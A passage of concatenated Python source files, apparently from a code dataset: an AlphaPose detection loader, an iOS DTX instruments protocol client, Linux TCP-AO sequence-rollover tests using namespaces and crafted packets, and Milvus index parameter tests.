self._sigma = cfg.DATA_PRESET.SIGMA
if cfg.DATA_PRESET.TYPE == 'simple':
self.transformation = SimpleTransform(
self, scale_factor=0,
input_size=self._input_size,
output_size=self._output_size,
rot=0, sigma=self._sigma,
train=False, add_dpg=False, gpu_device=self.device)
# initialize the queue used to store data
"""
image_queue: the buffer storing pre-processed images for object detection
det_queue: the buffer storing human detection results
pose_queue: the buffer storing post-processed cropped human image for pose estimation
"""
if opt.sp:
self._stopped = False
self.image_queue = Queue(maxsize=queueSize)
self.det_queue = Queue(maxsize=10 * queueSize)
self.pose_queue = Queue(maxsize=10 * queueSize)
else:
self._stopped = mp.Value('b', False)
self.image_queue = mp.Queue(maxsize=queueSize)
self.det_queue = mp.Queue(maxsize=10 * queueSize)
self.pose_queue = mp.Queue(maxsize=10 * queueSize)
def start_worker(self, target):
if self.opt.sp:
p = Thread(target=target, args=())
else:
p = mp.Process(target=target, args=())
# p.daemon = True
p.start()
return p
def start(self):
# start a thread to pre process images for object detection
if self.mode == 'image':
image_preprocess_worker = self.start_worker(self.image_preprocess)
elif self.mode == 'video':
image_preprocess_worker = self.start_worker(self.frame_preprocess)
# start a thread to detect human in images
image_detection_worker = self.start_worker(self.image_detection)
# start a thread to post process cropped human image for pose estimation
image_postprocess_worker = self.start_worker(self.image_postprocess)
return [image_preprocess_worker, image_detection_worker, image_postprocess_worker]
def stop(self):
# clear queues
self.clear_queues()
def terminate(self):
if self.opt.sp:
self._stopped = True
else:
self._stopped.value = True
self.stop()
def clear_queues(self):
self.clear(self.image_queue)
self.clear(self.det_queue)
self.clear(self.pose_queue)
def clear(self, queue):
while not queue.empty():
queue.get()
def wait_and_put(self, queue, item):
queue.put(item)
def wait_and_get(self, queue):
return queue.get()
def image_preprocess(self):
for i in range(self.num_batches):
imgs = []
orig_imgs = []
im_names = []
im_dim_list = []
for k in range(i * self.batchSize, min((i + 1) * self.batchSize, self.datalen)):
if self.stopped:
self.wait_and_put(self.image_queue, (None, None, None, None))
return
im_name_k = self.imglist[k]
# expected image shape like (1,3,h,w) or (3,h,w)
img_k = self.detector.image_preprocess(im_name_k)
if isinstance(img_k, np.ndarray):
img_k = torch.from_numpy(img_k)
# add one dimension at the front for batch if image shape (3,h,w)
if img_k.dim() == 3:
img_k = img_k.unsqueeze(0)
orig_img_k = scipy.misc.imread(im_name_k, mode='RGB')
im_dim_list_k = orig_img_k.shape[1], orig_img_k.shape[0]
imgs.append(img_k)
orig_imgs.append(orig_img_k)
im_names.append(im_name_k)
im_dim_list.append(im_dim_list_k)
with torch.no_grad():
# Human Detection
imgs = torch.cat(imgs)
im_dim_list = torch.FloatTensor(im_dim_list).repeat(1, 2)
# im_dim_list_ = im_dim_list
self.wait_and_put(self.image_queue, (imgs, orig_imgs, im_names, im_dim_list))
def frame_preprocess(self):
stream = cv2.VideoCapture(self.path)
assert stream.isOpened(), 'Cannot capture source'
for i in range(self.num_batches):
imgs = []
orig_imgs = []
im_names = []
im_dim_list = []
for k in range(i * self.batchSize, min((i + 1) * self.batchSize, self.datalen)):
(grabbed, frame) = stream.read()
# if the `grabbed` boolean is `False`, then we have
# reached the end of the video file
if not grabbed or self.stopped:
                    # put the remaining pre-processed data into the queue
if len(imgs) > 0:
with torch.no_grad():
# Record original image resolution
imgs = torch.cat(imgs)
im_dim_list = torch.FloatTensor(im_dim_list).repeat(1, 2)
self.wait_and_put(self.image_queue, (imgs, orig_imgs, im_names, im_dim_list))
self.wait_and_put(self.image_queue, (None, None, None, None))
                    print('===========================> This video got ' + str(k) + ' frames in total.')
sys.stdout.flush()
stream.release()
return
# expected frame shape like (1,3,h,w) or (3,h,w)
img_k = self.detector.image_preprocess(frame)
if isinstance(img_k, np.ndarray):
img_k = torch.from_numpy(img_k)
# add one dimension at the front for batch if image shape (3,h,w)
if img_k.dim() == 3:
img_k = img_k.unsqueeze(0)
im_dim_list_k = frame.shape[1], frame.shape[0]
imgs.append(img_k)
orig_imgs.append(frame[:, :, ::-1])
im_names.append(str(k) + '.jpg')
im_dim_list.append(im_dim_list_k)
with torch.no_grad():
# Record original image resolution
imgs = torch.cat(imgs)
im_dim_list = torch.FloatTensor(im_dim_list).repeat(1, 2)
# im_dim_list_ = im_dim_list
self.wait_and_put(self.image_queue, (imgs, orig_imgs, im_names, im_dim_list))
stream.release()
def image_detection(self):
for i in range(self.num_batches):
imgs, orig_imgs, im_names, im_dim_list = self.wait_and_get(self.image_queue)
if imgs is None or self.stopped:
self.wait_and_put(self.det_queue, (None, None, None, None, None, None, None))
return
with torch.no_grad():
                # pad the batch with duplicate images up to a full batchSize, otherwise batched detection breaks
for pad_i in range(self.batchSize - len(imgs)):
imgs = torch.cat((imgs, torch.unsqueeze(imgs[0], dim=0)), 0)
im_dim_list = torch.cat((im_dim_list, torch.unsqueeze(im_dim_list[0], dim=0)), 0)
dets = self.detector.images_detection(imgs, im_dim_list)
if isinstance(dets, int) or dets.shape[0] == 0:
for k in range(len(orig_imgs)):
self.wait_and_put(self.det_queue, (orig_imgs[k], im_names[k], None, None, None, None, None))
continue
if isinstance(dets, np.ndarray):
dets = torch.from_numpy(dets)
dets = dets.cpu()
boxes = dets[:, 1:5]
scores = dets[:, 5:6]
if self.opt.tracking:
ids = dets[:, 6:7]
else:
ids = torch.zeros(scores.shape)
for k in range(len(orig_imgs)):
boxes_k = boxes[dets[:, 0] == k]
if isinstance(boxes_k, int) or boxes_k.shape[0] == 0:
self.wait_and_put(self.det_queue, (orig_imgs[k], im_names[k], None, None, None, None, None))
continue
inps = torch.zeros(boxes_k.size(0), 3, *self._input_size)
cropped_boxes = torch.zeros(boxes_k.size(0), 4)
self.wait_and_put(self.det_queue, (orig_imgs[k], im_names[k], boxes_k, scores[dets[:, 0] == k], ids[dets[:, 0] == k], inps, cropped_boxes))
def image_postprocess(self):
for i in range(self.datalen):
with torch.no_grad():
(orig_img, im_name, boxes, scores, ids, inps, cropped_boxes) = self.wait_and_get(self.det_queue)
if orig_img is None or self.stopped:
self.wait_and_put(self.pose_queue, (None, None, None, None, None, None, None))
return
if boxes is None or boxes.nelement() == 0:
self.wait_and_put(self.pose_queue, (None, orig_img, im_name, boxes, scores, ids, None))
continue
# imght = orig_img.shape[0]
# imgwidth = orig_img.shape[1]
for i, box in enumerate(boxes):
inps[i], cropped_box = self.transformation.test_transform(orig_img, box)
cropped_boxes[i] = torch.FloatTensor(cropped_box)
# inps, cropped_boxes = self.transformation.align_transform(orig_img, boxes)
self.wait_and_put(self.pose_queue, (inps, orig_img, im_name, boxes, scores, ids, cropped_boxes))
def read(self):
return self.wait_and_get(self.pose_queue)
@property
def stopped(self):
if self.opt.sp:
return self._stopped
else:
return self._stopped.value
@property
def length(self):
return self.datalen
@property
def joint_pairs(self):
"""Joint pairs which defines the pairs of joint to be swapped
when the image is flipped horizontally."""
return [[1, 2], [3, 4], [5, 6], [7, 8],
[9, 10], [11, 12], [13, 14], [15, 16]]
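# Usage sketch (the `detector`, `cfg` and `opt` objects come from the AlphaPose
# pipeline and are assumptions here, not defined in this file):
#   det_loader = DetectionLoader(im_names, detector, cfg, opt, mode='image', batchSize=4)
#   workers = det_loader.start()
#   for _ in range(det_loader.length):
#       inps, orig_img, im_name, boxes, scores, ids, cropped_boxes = det_loader.read()
#       ...  # feed `inps` to the pose estimation model
#   det_loader.stop()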
|
dvt.py
|
import enum
import queue
import typing
from collections import defaultdict
from threading import Thread, Event
from ..util import logging, Log
from ..util.dtx_msg import DTXMessage, MessageAux, dtx_message_header, object_to_aux
from ..util.exceptions import MuxError
from ..util.variables import LOG
log = Log.getLogger(LOG.Instrument.value)
class DTXEnum(str, enum.Enum):
FINISHED = "finished:"
class DTXClient:
def __init__(self):
self._dtx_manager = {}
def recv(self, client, length) -> bytes:
buf = bytearray()
while len(buf) < length:
chunk = client.recv(length - len(buf))
if not chunk:
raise MuxError("socket connection close")
buf.extend(chunk)
        log.debug(f'received DTX buf: {buf}')
return buf
def send_dtx(self, client, dtx):
buffer = bytes(dtx)
        log.debug(f'sending DTX: {buffer}')
return client.send(buffer)
def recv_dtx(self, client):
"""
:param client:
:param timeout: (s)
:return:
"""
payload = bytearray()
while True:
header_buffer = self.recv(client, dtx_message_header.sizeof())
if not header_buffer:
return None
header = dtx_message_header.parse(header_buffer)
if header.fragment_id == 0:
if header.channel not in self._dtx_manager:
self._dtx_manager[header.channel] = (header_buffer, payload)
if header.fragment_count > 1:
continue
body_buffer = self.recv(client, header.payload_length)
if not body_buffer:
break
self._dtx_manager.get(header.channel)[1].extend(body_buffer)
if header.fragment_id == header.fragment_count - 1:
break
data = self._dtx_manager.get(header.channel)
self._dtx_manager.pop(header.channel)
return DTXMessage.decode(data[0], data[1])
class DTXServer:
def __init__(self, lockdown=None, udid=None):
self.udid = udid
self.lockdown = lockdown
self._cli = None
self._recv_thread = None
self._running = False
self._callbacks = {}
self._undefined_callback = None
self._channel_callbacks = {}
self._channels = {}
self._receiver_exiting = False
self._published_capabilities = None
self._reply_queues = defaultdict(queue.Queue)
self._next_identifier = 1
self._client = DTXClient()
self.done = Event()
self.register()
def register(self):
def _notifyOfPublishedCapabilities(res):
self.done.set()
self._published_capabilities = res.auxiliaries
self.register_selector_callback("_notifyOfPublishedCapabilities:", _notifyOfPublishedCapabilities)
def init(self, _cli=None):
""" 继承类
初始化 servers 服务:
:return: bool 是否成功
"""
self._cli = _cli
self._start()
return self
def _start(self):
"""
        Start the server service. Users should not call this directly; use init() instead.
        :return: bool, whether the service started successfully
"""
if self._running:
return True
self._running = True
self._recv_thread = Thread(target=self._receiver, name="InstrumentServer")
self._recv_thread.start()
        if not self.done.wait(5):
            logging.debug("[WARN] timed out waiting for published capabilities")
            return False
return True
def stop(self):
"""
        Stop the server service.
        :return: None
"""
self._running = False
if self._recv_thread:
self._recv_thread = None
if self._cli:
self._cli.close()
self._cli = None
def _run_callbacks(self, event_name, data):
"""
        Invoke the callback registered for event_name, if any.
        Returns:
            True if a callback was registered and invoked
"""
func = self._callbacks.get(event_name)
if func:
func(data)
return True
def register_selector_callback(self, selector: str, callback: typing.Callable):
"""
        :param selector: selector (method name) to match
        :param callback: callable invoked with the matching DTXMessage
"""
self._callbacks[selector] = callback
def register_channel_callback(self, channel: str, callback: typing.Callable):
"""
        Register a callback that receives all messages on the given channel.
        :param channel: channel name, e.g. an instruments service identifier
        :param callback: callable invoked with each DTXMessage on that channel
"""
log.info(f'set {channel} callback ...')
channel_id = self.make_channel(channel)
self._channel_callbacks[channel_id] = callback
def register_undefined_callback(self, callback: typing.Callable):
"""
        Register a fallback callback for messages no other handler matches.
        :param callback: callable invoked with each unhandled DTXMessage
"""
self._undefined_callback = callback
def make_channel(self, channel: str):
if channel in self._channels:
return self._channels[channel]
channel_id = len(self._channels) + 1
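        # Channel ids are allocated locally starting from 1 and announced to the
        # remote end via the _requestChannelWithCode:identifier: selector on channel 0.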
self._call(True, 0, "_requestChannelWithCode:identifier:", channel_id, channel)
self._channels[channel] = channel_id
return channel_id
def call(self, channel: str, selector: str, *auxiliaries):
channel_id = self.make_channel(channel)
ret = self._call(True, channel_id, selector, *auxiliaries)
return ret
def _reply_ack(self, data):
reply = DTXMessage()
reply._channel_code = data.channel_code
reply._identifier = data.identifier
reply._conversation_index = data.conversation_index + 1
reply._flags = 0x3
reply._selector = b'\00' * 16
self._client.send_dtx(self._cli, reply)
def wait_reply(self, message_id: int, timeout=30.0) -> DTXMessage:
ret = self._reply_queues[message_id].get(timeout=timeout)
if ret is None:
raise MuxError("connection closed")
return ret
def _call(self, sync: bool, channel_id: int, selector: str, *auxiliaries):
"""
        :param sync: whether to wait for (and return) the reply
        :param channel_id: channel identifier
        :param selector: name of the method to invoke
        :param auxiliaries: arguments passed along as the message auxiliaries
        :return: the reply DTXMessage when sync is True, otherwise None
"""
identifier = self._next_identifier
dtx = DTXMessage()
dtx._identifier = identifier
dtx._channel_code = channel_id
dtx._selector = selector
dtx._expects_reply = sync
aux = MessageAux()
dtx.auxiliaries = aux
self._next_identifier += 1
for arg in auxiliaries:
object_to_aux(arg, aux)
self._client.send_dtx(self._cli, dtx)
if sync:
ret = self.wait_reply(identifier)
return ret
def _receiver(self):
try:
while self._running:
dtx = self._client.recv_dtx(self._cli)
if '_channelCanceled:' in str(dtx.selector):
self._cli.close()
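                # conversation_index == 1 marks a reply to a request we sent; route it
                # to the queue that the matching _call()/wait_reply() is blocked on.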
if dtx.conversation_index == 1:
self._reply_queues[dtx.identifier].put(dtx)
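                # Messages initiated by the remote side arrive with a channel code of
                # 2**32 - local_channel_id (a negative id in signed 32-bit terms);
                # map it back to look up the registered channel callback.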
elif (2 ** 32 - dtx.channel_code) in self._channel_callbacks:
self._channel_callbacks[(2 ** 32 - dtx.channel_code)](dtx)
else:
selector = dtx.selector
if isinstance(selector, str) and selector in self._callbacks:
self._callbacks[selector](dtx)
elif self._undefined_callback:
self._undefined_callback(dtx)
if dtx.expects_reply:
self._reply_ack(dtx)
except MuxError as E:
            log.warning(E)
except Exception as E:
log.exception(E)
finally:
self._run_callbacks(DTXEnum.FINISHED, None)
self.stop()
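# --- Hypothetical usage sketch (not part of the original module) -------------
# Rough illustration of how a caller might drive DTXServer once a transport
# socket to the device's instruments service has been obtained elsewhere; the
# `connected_cli` argument, the channel name and the selector shown here are
# assumptions for the example, not guarantees about any particular device.
def _example_dtx_usage(connected_cli):
    server = DTXServer().init(connected_cli)
    # Observe everything the device pushes on one instruments channel.
    server.register_channel_callback(
        "com.apple.instruments.server.services.deviceinfo",
        lambda msg: print("channel message:", msg.selector),
    )
    # Synchronous request/reply: call() blocks until the reply arrives.
    reply = server.call(
        "com.apple.instruments.server.services.deviceinfo",
        "runningProcesses",
    )
    print("reply selector:", reply.selector)
    server.stop()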
|
test_sne.py
|
# SPDX-License-Identifier: GPL-2.0
"""Validate SNE implementation for TCP-AO"""
import logging
import socket
import subprocess
from contextlib import ExitStack
from ipaddress import ip_address
from threading import Thread
import pytest
import waiting
from scapy.layers.inet import TCP
from scapy.packet import Packet, Raw
from .exthread import ExThread
from .linux_tcp_authopt import (
TCP_AUTHOPT_ALG,
set_tcp_authopt_key_kwargs,
tcp_authopt_key,
)
from .linux_tcp_repair import get_tcp_repair_recv_send_queue_seq, tcp_repair_toggle
from .linux_tcp_repair_authopt import (
get_tcp_repair_authopt,
has_tcp_repair_authopt_on_sock,
)
from .netns_fixture import NamespaceFixture
from .scapy_conntrack import TCPConnectionKey, TCPConnectionTracker
from .scapy_tcp_authopt import (
TcpAuthOptAlg_HMAC_SHA1,
add_tcp_authopt_signature,
check_tcp_authopt_signature,
)
from .scapy_utils import AsyncSnifferContext, create_capture_socket, tcp_seq_wrap
from .server import SimpleServerThread
from .tcp_connection_fixture import TCPConnectionFixture
from .utils import (
DEFAULT_TCP_SERVER_PORT,
check_socket_echo,
create_client_socket,
create_listen_socket,
netns_context,
randbytes,
socket_set_linger,
)
from .validator import TcpAuthValidator, TcpAuthValidatorKey
logger = logging.getLogger(__name__)
def add_connection_info(
tracker: TCPConnectionTracker,
saddr,
daddr,
sport,
dport,
sisn,
disn,
):
client2server_key = TCPConnectionKey(
saddr=saddr,
daddr=daddr,
sport=sport,
dport=dport,
)
client2server_conn = tracker.get_or_create(client2server_key)
client2server_conn.sisn = sisn
client2server_conn.disn = disn
client2server_conn.snd_sne.reset(sisn)
client2server_conn.rcv_sne.reset(disn)
client2server_conn.found_syn = True
client2server_conn.found_synack = True
server2client_conn = tracker.get_or_create(client2server_key.rev())
server2client_conn.sisn = disn
server2client_conn.disn = sisn
server2client_conn.snd_sne.reset(disn)
server2client_conn.rcv_sne.reset(sisn)
server2client_conn.found_syn = True
server2client_conn.found_synack = True
@pytest.mark.parametrize("signed", [False, True])
def test_high_seq_rollover(exit_stack: ExitStack, signed: bool):
"""Test SNE by rolling over from a high seq/ack value
Create many connections until a very high seq/ack is found and then transfer
enough for those values to roll over.
A side effect of this approach is that this stresses connection
establishment.
"""
address_family = socket.AF_INET
overflow = 0x200000
bufsize = 0x10000
secret_key = b"12345"
mode = "echo"
validator_enabled = True
fail = False
nsfixture = exit_stack.enter_context(NamespaceFixture())
server_addr = nsfixture.get_addr(address_family, 1)
client_addr = nsfixture.get_addr(address_family, 2)
server_addr_port = (str(server_addr), DEFAULT_TCP_SERVER_PORT)
listen_socket = create_listen_socket(
ns=nsfixture.server_netns_name,
family=address_family,
bind_addr=server_addr,
listen_depth=1024,
)
exit_stack.enter_context(listen_socket)
tcp_repair_authopt_enabled = has_tcp_repair_authopt_on_sock(listen_socket)
if signed:
set_tcp_authopt_key_kwargs(listen_socket, key=secret_key)
server_thread = SimpleServerThread(listen_socket, mode=mode, bufsize=bufsize)
exit_stack.enter_context(server_thread)
found = False
client_socket = None
for iternum in range(50000):
try:
# Manually assign increasing client ports
#
# Sometimes linux kills timewait sockets (TCPTimeWaitOverflow) and
# then attempts to reuse the port. The stricter validation
# requirements of TCP-AO mean the other side of the socket survives
# and rejects packets coming from the reused port.
#
# This issue is not related to SNE so a workaround is acceptable.
client_socket = create_client_socket(
ns=nsfixture.client_netns_name,
family=address_family,
bind_addr=client_addr,
bind_port=10000 + iternum,
)
if signed:
set_tcp_authopt_key_kwargs(client_socket, key=secret_key)
try:
client_socket.connect(server_addr_port)
except:
logger.error("failed connect on iteration %d", iternum, exc_info=True)
raise
recv_seq, send_seq = get_tcp_repair_recv_send_queue_seq(client_socket)
if (recv_seq + overflow > 0x100000000 and mode == "echo") or (
send_seq + overflow > 0x100000000
):
found = True
break
            # Wait for a graceful close to avoid swamping the server listen queue.
            # This keeps the test working even with listen_depth=1, although a
            # very high value is set anyway.
socket_set_linger(client_socket, 1, 1)
client_socket.close()
client_socket = None
finally:
if not found and client_socket:
client_socket.close()
assert found
assert client_socket is not None
logger.debug("setup recv_seq %08x send_seq %08x", recv_seq, send_seq)
# Init tcp_repair_authopt
if signed and tcp_repair_authopt_enabled:
with tcp_repair_toggle(client_socket):
init_tcp_repair_authopt = get_tcp_repair_authopt(client_socket)
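            # The reported ISNs are one less than the current queue sequence
            # numbers because the SYN/SYNACK each consume one sequence number.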
assert init_tcp_repair_authopt.src_isn + 1 == send_seq
assert init_tcp_repair_authopt.dst_isn + 1 == recv_seq
assert init_tcp_repair_authopt.snd_sne == 0
assert init_tcp_repair_authopt.rcv_sne == 0
logger.debug("tcp repair authopt: %r", init_tcp_repair_authopt)
# Init validator
if signed and validator_enabled:
capture_filter = f"tcp port {DEFAULT_TCP_SERVER_PORT}"
capture_socket = create_capture_socket(
ns=nsfixture.client_netns_name,
iface="veth0",
filter=capture_filter,
)
sniffer = exit_stack.enter_context(
AsyncSnifferContext(opened_socket=capture_socket)
)
validator = TcpAuthValidator()
validator.keys.append(
TcpAuthValidatorKey(key=secret_key, alg_name="HMAC-SHA-1-96")
)
# validator.debug_sne = True
# validator.log_traffic_key = True
# validator.log_mac = True
# SYN+SYNACK is not captured so initialize connection info manually
add_connection_info(
validator.tracker,
saddr=ip_address(client_addr),
daddr=ip_address(server_addr),
dport=client_socket.getpeername()[1],
sport=client_socket.getsockname()[1],
sisn=tcp_seq_wrap(send_seq - 1),
disn=tcp_seq_wrap(recv_seq - 1),
)
transfer_iter_count = 2 * overflow // bufsize
logger.info(
"transfer %d bytes in %d iterations",
2 * overflow,
transfer_iter_count,
)
for iternum in range(transfer_iter_count):
try:
if mode == "recv":
from .utils import randbytes
send_buf = randbytes(bufsize)
client_socket.sendall(send_buf)
else:
check_socket_echo(client_socket, bufsize)
except:
logger.error("failed traffic on iteration %d", iternum, exc_info=True)
fail = True
break
new_recv_seq, new_send_seq = get_tcp_repair_recv_send_queue_seq(client_socket)
logger.debug("final recv_seq %08x send_seq %08x", new_recv_seq, new_send_seq)
if not (new_recv_seq < recv_seq or new_send_seq < send_seq):
fail = True
# Validate capture
if signed and validator_enabled:
import time
time.sleep(1)
sniffer.stop()
for p in sniffer.results:
validator.handle_packet(p)
# Allow incomplete connections from FIN/ACK of connections dropped
# because of low seq/ack
# validator.raise_errors(allow_incomplete=True)
if validator.any_fail or validator.any_unsigned:
fail = True
client_scappy_key = TCPConnectionKey(
saddr=ip_address(client_addr),
daddr=ip_address(server_addr),
dport=client_socket.getpeername()[1],
sport=client_socket.getsockname()[1],
)
client_scappy_conn = validator.tracker.get(client_scappy_key)
assert client_scappy_conn
snd_sne_rollover = client_scappy_conn.snd_sne.sne != 0
rcv_sne_rollover = client_scappy_conn.rcv_sne.sne != 0
if not (snd_sne_rollover or rcv_sne_rollover):
logger.error("expected either snd_snd or rcv_sne to rollover")
fail = True
# Validate SNE as read via TCP_REPAIR_AUTHOPT
if signed and tcp_repair_authopt_enabled:
with tcp_repair_toggle(client_socket):
exit_tcp_repair_authopt = get_tcp_repair_authopt(client_socket)
logger.debug("exit tcp repair authopt: %r", exit_tcp_repair_authopt)
assert exit_tcp_repair_authopt.src_isn == init_tcp_repair_authopt.src_isn
assert exit_tcp_repair_authopt.dst_isn == init_tcp_repair_authopt.dst_isn
if not (exit_tcp_repair_authopt.snd_sne or exit_tcp_repair_authopt.rcv_sne):
logger.error("expected either snd_snd or rcv_sne to rollover")
fail = True
assert not fail
def _block_client_tcp(nsfixture: NamespaceFixture, address_family=socket.AF_INET):
"""Prevent TCP in client namespace from sending RST
Do this by removing the client address and inserting a static ARP on server side.
"""
client_prefix_length = nsfixture.get_prefix_length(address_family)
client_addr = nsfixture.get_ipv4_addr(2, 1)
    script = f"""
    set -e
    ip netns exec {nsfixture.client_netns_name} ip addr del {client_addr}/{client_prefix_length} dev veth0
    ip netns exec {nsfixture.server_netns_name} ip neigh add {client_addr} lladdr {nsfixture.client_mac_addr} dev veth0
    """
subprocess.run(script, shell=True, check=True)
@pytest.mark.parametrize("client_isn", [0xFFFF0000, 0xFFFFFFFF], ids=hex)
def test_syn_seq_ffffffff(exit_stack: ExitStack, client_isn):
"""Test SYN with seq=0xffffffff
Client is pytest, server is linux.
"""
con = TCPConnectionFixture()
secret_key = b"hello"
con.tcp_authopt_key = tcp_authopt_key(
alg=TCP_AUTHOPT_ALG.HMAC_SHA_1_96,
key=secret_key,
)
exit_stack.enter_context(con)
client_l2socket = con.client_l2socket
server_isn = 0
DEFAULT_BUFSIZE = 1000
def sign(packet, sne=0):
add_tcp_authopt_signature(
packet,
TcpAuthOptAlg_HMAC_SHA1(),
secret_key,
client_isn,
server_isn,
sne=sne,
)
_block_client_tcp(con.nsfixture)
# send SYN
p = con.create_client2server_packet()
p[TCP].flags = "S"
p[TCP].seq = client_isn
p[TCP].ack = 0
sign(p)
client_l2socket.send(p)
# wait SYN/ACK
def has_synack():
return (
con.sniffer_session.client_info is not None
and con.sniffer_session.client_info.disn is not None
)
waiting.wait(has_synack, timeout_seconds=5, sleep_seconds=0.1)
assert con.sniffer_session.client_info.disn
server_isn = con.sniffer_session.client_info.disn
# send ACK to SYN/ACK
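    # With client_isn == 0xFFFFFFFF, client_isn + 1 overflows 32 bits:
    # tcp_seq_wrap() folds the on-wire SEQ back to 0, while (client_isn + 1) >> 32
    # yields SNE == 1, which must be fed into the signature for this segment.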
p = con.create_client2server_packet()
p[TCP].flags = "A"
p[TCP].seq = tcp_seq_wrap(client_isn + 1)
p[TCP].ack = tcp_seq_wrap(server_isn + 1)
sign(p, sne=(client_isn + 1) >> 32)
client_l2socket.send(p)
# send data
p = con.create_client2server_packet()
p[TCP].flags = "PA"
p[TCP].seq = tcp_seq_wrap(client_isn + 1)
p[TCP].ack = tcp_seq_wrap(server_isn + 1)
p /= Raw(randbytes(DEFAULT_BUFSIZE))
sign(p, sne=(client_isn + 1) >> 32)
client_l2socket.send(p)
def has_response():
con.assert_no_snmp_output_failures()
plist = con.sniffer_session.toPacketList()
logger.info("sniffer list:\n%s", plist)
for p in plist:
logger.info("p %s len %d", p.summary(), len(p))
th = p.getlayer(TCP)
if not th:
continue
logger.info("th %s len %d", p.summary(), len(th.payload))
if th.sport != DEFAULT_TCP_SERVER_PORT:
continue
th_end_seq = th.seq + len(th.payload)
logger.info(
"th_end_seq %08x versus server_isn %08x", th_end_seq, server_isn
)
if th_end_seq - server_isn >= DEFAULT_BUFSIZE:
logger.info("packet %s looks like a server response", th.summary())
return True
return False
waiting.wait(has_response, timeout_seconds=5, sleep_seconds=1)
def _block_server_tcp(nsfixture: NamespaceFixture, address_family=socket.AF_INET):
splen = nsfixture.get_prefix_length(address_family)
saddr = nsfixture.get_ipv4_addr(1, 1)
    script = f"""
    set -e
    ip netns exec {nsfixture.server_netns_name} ip addr del {saddr}/{splen} dev veth0
    ip netns exec {nsfixture.client_netns_name} ip neigh add {saddr} lladdr {nsfixture.server_mac_addr} dev veth0
    """
subprocess.run(script, shell=True, check=True)
@pytest.mark.parametrize("server_isn", [0xFFFF0000, 0xFFFFFFFF], ids=hex)
def test_synack_seq_ffffffff(exit_stack: ExitStack, server_isn: int):
"""Test SYNACK with seq=0xffffffff
Verifies linux client behavior against a server that sends SYNACK with seq=0xffffffff
"""
secret_key = b"hello"
con = TCPConnectionFixture(capture_on_client=True)
con.tcp_authopt_key = tcp_authopt_key(
alg=TCP_AUTHOPT_ALG.HMAC_SHA_1_96,
key=secret_key,
)
exit_stack.enter_context(con)
sniffer_session = con.sniffer_session
server_l2socket = con.server_l2socket
client_isn = 0
def sign(packet, sne=0):
add_tcp_authopt_signature(
packet,
TcpAuthOptAlg_HMAC_SHA1(),
secret_key,
server_isn,
client_isn,
sne=sne,
)
_block_server_tcp(con.nsfixture)
def run_client_thread():
# If this fails it will likely be with a timeout
logger.info("client connect call")
con.client_socket.connect(con.server_addr_port)
logger.info("client connect done")
client_thread = ExThread(target=run_client_thread)
client_thread.start()
# wait SYN
def has_recv_syn():
return (
con.sniffer_session.server_info is not None
and con.sniffer_session.server_info.disn is not None
)
waiting.wait(has_recv_syn, timeout_seconds=5, sleep_seconds=0.1)
assert sniffer_session.server_info.disn is not None
client_isn = sniffer_session.server_info.disn
logger.info("Received SYN with SEQ=%d", client_isn)
# craft SYN/ACK
p = con.create_server2client_packet()
p[TCP].flags = "SA"
p[TCP].seq = server_isn
p[TCP].ack = tcp_seq_wrap(client_isn + 1)
sign(p)
server_l2socket.send(p)
def is_client_ack(p: Packet):
th = p.getlayer(TCP)
if not th:
return False
if not sniffer_session.server_info.is_recv_match(p):
return False
if th.flags.A and th.ack == tcp_seq_wrap(server_isn + 1):
check_tcp_authopt_signature(
p,
TcpAuthOptAlg_HMAC_SHA1(),
secret_key,
client_isn,
server_isn,
sne=(server_isn + 1) >> 32,
)
return True
return False
def sniffer_has_packet(pred):
for p in sniffer_session.lst:
if pred(p):
return True
return False
def has_client_ack():
return sniffer_has_packet(is_client_ack)
waiting.wait(has_client_ack, timeout_seconds=5, sleep_seconds=0.1)
# No attempt is made to transfer data
    # Will raise any errors from run_client_thread
client_thread.join()
|
test_index.py
|
import pytest
from base.client_base import TestcaseBase
from base.index_wrapper import ApiIndexWrapper
from utils.util_log import test_log as log
from common import common_func as cf
from common import common_type as ct
from common.common_type import CaseLabel, CheckTasks
from common.code_mapping import CollectionErrorMessage as clem
from common.code_mapping import IndexErrorMessage as iem
from utils.utils import *
from common.constants import *
prefix = "index"
default_schema = cf.gen_default_collection_schema()
default_field_name = ct.default_float_vec_field_name
default_index_params = {"index_type": "IVF_SQ8", "metric_type": "L2", "params": {"nlist": 64}}
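# IVF_SQ8 partitions vectors into `nlist` cluster units and scalar-quantizes
# them to 8 bits; metric_type "L2" selects Euclidean distance. These defaults
# are reused by most cases below.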
# copied from pymilvus
uid = "test_index"
BUILD_TIMEOUT = 300
field_name = default_float_vec_field_name
binary_field_name = default_binary_vec_field_name
query, query_vecs = gen_query_vectors(field_name, default_entities, default_top_k, 1)
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
class TestIndexParams(TestcaseBase):
""" Test case of index interface """
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("collection", [None, "coll"])
def test_index_non_collection(self, collection):
"""
target: test index with None collection
        method: pass a None collection object
expected: raise exception
"""
self._connect()
self.index_wrap.init_index(collection, default_field_name, default_index_params, check_task=CheckTasks.err_res,
check_items={ct.err_code: 0, ct.err_msg: clem.CollectionType})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("field_name", ct.get_invalid_strs)
def test_index_field_name_invalid(self, field_name):
"""
        target: test index with an invalid field name
        method: input an invalid field name
expected: raise exception
"""
collection_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=collection_name)
log.error(iem.WrongFieldName % str(field_name))
self.index_wrap.init_index(collection_w.collection, field_name, default_index_params,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: iem.WrongFieldName % str(field_name)})
@pytest.mark.tags(CaseLabel.L1)
def test_index_field_name_not_existed(self):
"""
        target: test index with a field name that does not exist
        method: input a field name that was never created
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
f_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
self.index_wrap.init_index(collection_w.collection, f_name, default_index_params, check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: f"cannot create index on non-existed field: {f_name}"})
@pytest.mark.tags(CaseLabel.L0)
# TODO (reason="pymilvus issue #677", raises=TypeError)
@pytest.mark.parametrize("index_type", ct.get_invalid_strs)
def test_index_type_invalid(self, index_type):
"""
        target: test index with an invalid index type
method: input invalid index type
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
index_params = copy.deepcopy(default_index_params)
index_params["index_type"] = index_type
if not isinstance(index_params["index_type"], str):
msg = "must be str"
else:
msg = "Invalid index_type"
